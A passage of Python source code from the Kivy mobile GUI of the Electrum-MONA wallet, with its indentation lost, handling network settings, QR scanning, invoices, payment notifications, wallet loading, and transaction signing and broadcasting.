auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, False)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME:
self.set_URI(data)
elif scheme == LIGHTNING_URI_SCHEME:
self.set_ln_invoice(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Orientation of the device.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.android_backups = config.get('android_backups', False)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_mona.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_mona.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_mona import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for monacoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = check_password_for_directory(self.electrum_config, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels:
warning1 = _("Lightning support in Electrum is experimental. "
"Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable "
"from your seed. You must backup your wallet file everytime "
"you create a new channel.")
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning1 + '\n\n' + warning2, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_mona.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_mona.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_mona.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-MONA', message,
app_icon=icon, app_name='Electrum-MONA')
except ImportError:
self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
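# Typical call (illustrative comment-only sketch; the argument values are
# examples chosen here, not taken from the surrounding code):
#
#     self.show_info_bubble(text=_('Text copied to clipboard'),
#                           arrow_pos='bottom_mid', duration=2, width='200dp')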
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
